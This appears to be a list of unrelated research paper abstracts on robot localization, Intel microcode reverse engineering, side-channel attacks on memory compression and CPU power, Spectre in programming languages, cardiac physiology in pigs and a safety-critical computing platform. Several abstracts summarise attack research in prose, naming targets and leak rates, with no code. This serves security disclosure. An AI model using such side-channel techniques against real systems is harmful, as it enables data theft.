Evaluation of an indoor localization system for a mobile robot

Although indoor localization has been a wide researched topic, obtained results may not fit the requirements that some domains need. Most approaches are not able to precisely localize a fast moving object even with a complex installation, which makes their implementation in the automated driving domain complicated. In this publication, common technologies were analyzed and a commercial product, called Marvelmind Indoor GPS, was chosen for our use case in which both ultrasound and radio frequency communications are used. The evaluation is given in a first moment on small indoor scenarios with static and moving objects. Further tests were done on wider areas, where the system is integrated within our Robotics Operating System (ROS)-based self-developed 'Smart PhysIcal Demonstration and evaluation Robot (SPIDER)' and the results of these outdoor tests are compared with the obtained localization by the installed GPS on the robot. Finally, the next steps to improve the results in further developments are discussed

CustomProcessingUnit: Reverse Engineering and Customization of Intel Microcode

Microcode provides an abstraction layer over the instruction set to decompose complex instructions into simpler micro-operations that can be more easily implemented in hardware. It is an essential optimization to simplify the design of x86 processors. However, introducing an additional layer of software beneath the instruction set poses security and reliability concerns. The microcode details are confidential to the manufacturers, preventing independent auditing or customization of the microcode. Moreover, microcode patches are signed and encrypted to prevent unauthorized patching and reverse engineering. However, recent research has recovered decrypted microcode and reverse-engineered read/write debug mechanisms on Intel Goldmont (Atom), making analysis and customization of microcode possible on a modern Intel microarchitecture. In this work, we present the first framework for static and dynamic analysis of Intel microcode. Building upon prior research, we reverse-engineer Goldmont microcode semantics and reconstruct the patching primitives for microcode customization. For static analysis, we implement a Ghidra processor module for decompilation and analysis of decrypted microcode. For dynamic analysis, we create a UEFI application that can trace and patch microcode to provide complete microcode control on Goldmont systems. Leveraging our framework, we reverse-engineer the confidential Intel microcode update algorithm and perform the first security analysis of its design and implementation. In three further case studies, we illustrate the potential security and performance benefits of microcode customization. We provide the first x86 Pointer Authentication Code (PAC) microcode implementation and its security evaluation, design and implement fast software breakpoints that are more than 1000x faster than standard breakpoints, and present constant-time microcode division, illustrating the potential security and performance benefits of microcode customization

Practical Timing Side-Channel Attacks on Memory Compression

Compression algorithms have side channels due to their data-dependent operations. So far only the compression-ratio side channel was exploited, e.g., the compressed data size. In this paper, we present Decomp+Time, the first memory compression attack exploiting a timing side channel in compression algorithms. While Decomp+Time affects a much broader set of applications than prior work, a key challenge is precisely crafting attacker-controlled compression payloads to enable the attack with sufficient resolution. We develop an evolutionary fuzzer, Comprezzor, to find effective Decomp+Time payloads that optimize latency differences and find payloads that are so effective that decompression timing can even be exploited in remote Decomp+Time attacks across the Internet. Decomp+Time has a capacity of 9.73 kB/s locally, and 10.72 bit/min across the internet (14 hops, > 700 miles). Using Comprezzor, we develop attacks that leak data byte-by-byte in four different case studies: First, we leak 1.50 bit/min from Memcached on a remote server running a PHP application. Second, we leak database records with 2.69 bit/min from PostgreSQL, managed by a Python-Flask application, over the internet. Third, we leak secrets with 49.14 bit/min locally from ZRAM-compressed pages on Linux. Fourth, we leak internal heap pointers from the V8 engine within the Google Chrome browser on a system using ZRAM. This highlights the importance of re-evaluating the use of compression on sensitive data even if the application is only reachable via a remote interface

Systematic analysis of programming languages and their execution environments for spectre attacks

In this paper, we analyze the security of programming languages and their execution environments (compilers and interpreters) with respect to Spectre attacks. The analysis shows that only 16 out of 42 execution environments have mitigations against at least one Spectre variant, i.e., 26 have no mitigations against any Spectre variant. Using our novel tool Speconnector, we develop Spectre proof-of-concept attacks in 8 programming languages and on code generated by 11 execution environments that were previously not known to be affected. Our results highlight some programming languages that are used to implement security-critical code, but remain entirely unprotected, even three years after the discovery of Spectre

Cardiac power output accurately reflects external cardiac work over a wide range of inotropic states in pigs

BACKGROUND: Cardiac power output (CPO), derived from the product of cardiac output and mean aortic pressure, is an important yet underexploited parameter for hemodynamic monitoring of critically ill patients in the intensive-care unit (ICU). The conductance catheter-derived pressure-volume loop area reflects left ventricular stroke work (LV SW). Dividing LV SW by time, a measure of LV SW min- 1 is obtained sharing the same unit as CPO (W). We aimed to validate CPO as a marker of LV SW min- 1 under various inotropic states. METHODS: We retrospectively analysed data obtained from experimental studies of the hemodynamic impact of mild hypothermia and hyperthermia on acute heart failure. Fifty-nine anaesthetized and mechanically ventilated closed-chest Landrace pigs (68 ± 1 kg) were instrumented with Swan-Ganz and LV pressure-volume catheters. Data were obtained at body temperatures of 33.0 °C, 38.0 °C and 40.5 °C; before and after: resuscitation, myocardial infarction, endotoxemia, sevoflurane-induced myocardial depression and beta-adrenergic stimulation. We plotted LVSW min- 1 against CPO by linear regression analysis, as well as against the following classical indices of LV function and work: LV ejection fraction (LV EF), rate-pressure product (RPP), triple product (TP), LV maximum pressure (LVPmax) and maximal rate of rise of LVP (LV dP/dtmax). RESULTS: CPO showed the best correlation with LV SW min- 1 (r2 = 0.89; p < 0.05) while LV EF did not correlate at all (r2 = 0.01; p = 0.259). Further parameters correlated moderately with LV SW min- 1 (LVPmax r2 = 0.47, RPP r2 = 0.67; and TP r2 = 0.54). LV dP/dtmax correlated worst with LV SW min- 1 (r2 = 0.28). CONCLUSION: CPO reflects external cardiac work over a wide range of inotropic states. These data further support the use of CPO to monitor inotropic interventions in the ICU

Collide+Power: Leaking Inaccessible Data with Software-based Power Side Channels

Differential Power Analysis (DPA) measures single-bit differences between data values used in computer systems by statistical analysis of power traces. In this paper, we show that the mere co-location of data values, e.g., attacker and victim data in the same buffers and caches, leads to power leakage in modern CPUs that depends on a combination of both values, resulting in a novel attack, Collide+Power. We systematically analyze the power leakage of the CPU's memory hierarchy to derive precise leakage models enabling practical end-to-end attacks. These attacks can be conducted in software with any signal related to power consumption, e.g., power consumption interfaces or throttling-induced timing variations. Leakage due to throttling requires 133.3 times more samples than direct power measurements. We develop a novel differential measurement technique amplifying the exploitable leakage by a factor of 8.778 on average, compared to a straightforward DPA approach. We demonstrate that Collide+Power leaks single-bit differences from the CPU's memory hierarchy with fewer than 23000 measurements. Collide+Power varies attacker-controlled data in our end-to-end DPA attacks. We present a Meltdown-style attack, leaking from attacker-chosen memory locations, and a faster MDS-style attack, which leaks 4.82 bit/h. Collide+Power is a generic attack applicable to any modern CPU, arbitrary memory locations, and victim applications and data. However, the Meltdown-style attack is not yet practical, as it is limited by the state of the art of prefetching victim data into the cache, leading to an unrealistic real-world attack runtime with throttling of more than a year for a single bit. Given the different variants and potentially more practical prefetching methods, we consider Collide+Power a relevant threat that is challenging to mitigate

SELENE: Self-Monitored Dependable Platform for High-Performance Safety-Critical Systems.

© 2020 IEEE. Personal use of this material is permitted. Permission from IEEE must be obtained for all other uses, in any current or future media, including reprinting/republishing this material for advertising or promotional purposes, creating new collective works, for resale or redistribution to servers or lists, or reuse of any copyrighted component of this work in other works.[Otros] xisting HW/SW platforms for safety-critical systems suffer from limited performance and/or from lack of flexibility due to building on specific proprietary components. This jeopardizes their wide deployment across domains. While some research has been done to overcome these limitations, they have had limited success owing to missing flexibility and extensibility. Flexibility and extensibility are the cornerstones of industry adoption: industries dealing in capital goods need technologies on which they can rely on during decades (e.g. avionics, space, automotive). SELENE aims at covering this gap by proposing a new family of safety-critical computing platforms, which builds upon open source components such as the RISC-V instruction set architecture, GNU/Linux, and the Jailhouse hypervisor. SELENE will develop an advanced computing platform that is able to: (1) adapt the system to the specific requirements of different application domains, to changing environmental conditions, and to internal conditions of the system itself; (2) allow the integration of applications of different criticalities and performance demands in the same platform, guaranteeing functional and temporal isolation properties; (3) achieve flexible diverse redundancy by exploiting the inherent redundant capabilities of the multicore; and (4) efficiently execute compute-intensive applications by means of specific accelerators.This work has received funding from the European Unions Horizon 2020 research and innovation programme under grant agreement no. 871467.Hernández Luz, C.; Flich Cardo, J.; Paredes Palacios, R.; Lefebvre, C.; Allende, I.; Abella, J.; Trilla, D.... (2020). SELENE: Self-Monitored Dependable Platform for High-Performance Safety-Critical Systems. IEEE. 370-377. https://doi.org/10.1109/DSD51259.2020.00066S37037